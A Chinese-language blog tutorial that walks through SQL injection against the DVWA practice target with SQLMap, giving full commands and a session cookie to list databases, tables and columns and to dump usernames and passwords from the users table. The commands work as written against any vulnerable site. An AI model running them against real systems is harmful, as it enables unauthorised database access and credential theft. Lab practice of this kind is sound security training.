【安全/渗透测试】SQL注入、SQLMap工具、DVWA(靶机)

一、需要准备的工具或环境:浏览器、DVWA(靶机)、Python2、SQLMap

说明:Python2的作用是运行SQLMap

二、操作步骤:

1、通过浏览器的F12开发工具或其他开发工具,获取一个请求(访问的ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#)

2、利用SQLMap工具探测所有数据库

输入命令:sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35"  --dbs  --batch

 

 

探测出的所有数据库名如下图:

 3、利用SQLMap工具探测当前数据库,则只需要把选项"--dbs"改为“--current-db”即可,

输入命令:sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35"  --current-db  --batch,探测出的当前数据库名如下图:

 4、利用SQLMap工具探测当前数据库(dvwa)下的数据表名,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35"  --table -D "dvwa" --batch,探测出的表名如下图:

 5、利用SQLMap工具探测当前数据库(dvwa)下一个数据表(users)里的列名,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35"   --columns -T "users" -D "dvwa" --batch,探测出的列名如下图:

 6、利用SQLMap工具探测当前数据库(dvwa)下一个数据表(users)里指定列名(user_id,user,password)的数据,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35"  --dump -C "user_id,user,password" --columns -T "users" -D "dvwa" --batch,探测出的数据如下图:

 

 三、总结:先获取一个请求,然后使用SqlMap工具探测数据库,探测出数据库名后再依次探测数据表名、列名和数据。

posted @   走在新时代  阅读(550)  评论(0编辑  收藏  举报
(评论功能已被禁用)
编辑推荐:
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
阅读排行:
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
点击右上角即可分享
微信分享提示